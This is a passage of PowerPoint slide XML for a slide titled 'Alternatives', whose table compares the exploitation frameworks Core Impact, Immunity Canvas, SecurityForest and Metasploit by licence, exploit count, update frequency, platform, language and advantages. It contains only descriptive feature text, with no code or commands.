              </a:pPr>
              <a:t>38</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804309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0"/>
            <a:ext cx="9144000" cy="1306513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21507" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="41275" y="163513"/>
            <a:ext cx="1754188" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21508" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2420938" y="163513"/>
            <a:ext cx="6396037" cy="488950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2122488" y="600075"/>
            <a:ext cx="7021512" cy="766763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="124000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="655638" algn="l"/>
                <a:tab pos="1312863" algn="l"/>
                <a:tab pos="1968500" algn="l"/>
                <a:tab pos="2625725" algn="l"/>
                <a:tab pos="3282950" algn="l"/>
                <a:tab pos="3938588" algn="l"/>
                <a:tab pos="4595813" algn="l"/>
                <a:tab pos="5253038" algn="l"/>
                <a:tab pos="5908675" algn="l"/>
                <a:tab pos="6565900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Tabella 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="130175" y="1419225"/>
          <a:ext cx="8848829" cy="5535701"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1909653"/>
                <a:gridCol w="1691540"/>
                <a:gridCol w="1713626"/>
                <a:gridCol w="1771607"/>
                <a:gridCol w="1762403"/>
              </a:tblGrid>
              <a:tr h="806983">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>                       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Tools</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" smtClean="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Features</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600"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a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Core</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> Impact</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a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Immunity</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Canvas</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a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>SecurityForest</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600" kern="5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lgn="ctr">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Metasploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </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r>
              <a:tr h="858258">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>License</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en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>25.000$</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Open-source (but some libraries are only in binaries)</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dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>1.450$ </a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Open source</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>3 months of updates and support</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Free and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Open-source</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Free and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Open-source</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244">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Number</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Exploits</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it-IT" sz="1400" b="1" kern="50">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>-</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>more </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> 150</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>~2500 (at </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>February</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> 2005)</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>191 (at October 2007)</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750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Updates</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it-IT" sz="1400" b="1" kern="50">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Frequently (weekly)</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dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Frequently (average 4  exploit every month)</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Occasionally (last updates in 2005)</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Occasionally (last updates on October 2007)</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="5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737">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Platform</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it-IT" sz="1400" b="1" kern="50">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Only Windows</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err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Independent</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err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> Windows</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Independent</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0762">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Language</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it-IT" sz="1400" b="1" kern="50">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Python</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Python</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dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Perl for framework, many others languages for exploits (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>C,Perl,Python,Ruby,Shell</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>,...)</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a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Ruby, C, Assembler</a:t>
                      </a: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268">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1600" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Advantages</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1600" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25455" marR="25455" marT="25457" marB="25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50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Report system /</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Integrationwith</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> vulnerability assessment tools</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it-IT" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>0-day </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>payload</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dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Number of pre-compiled exploits (see </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0" err="1">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ExploitationTree</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>)</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b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Free /</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>IDS-IPS evasion /</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="50" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                          <a:ea typeface="DejaVuSans"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>support to write exploits and large used in security community</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1400" b="1" kern="50" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="DejaVuSans"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25455" marR="25455" marT="25457" marB="254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560" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="168275" cy="392113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21561" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-34925" y="-38100"/>
            <a:ext cx="1189038" cy="492125"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21562" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="414338"/>
            <a:ext cx="168275" cy="392112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
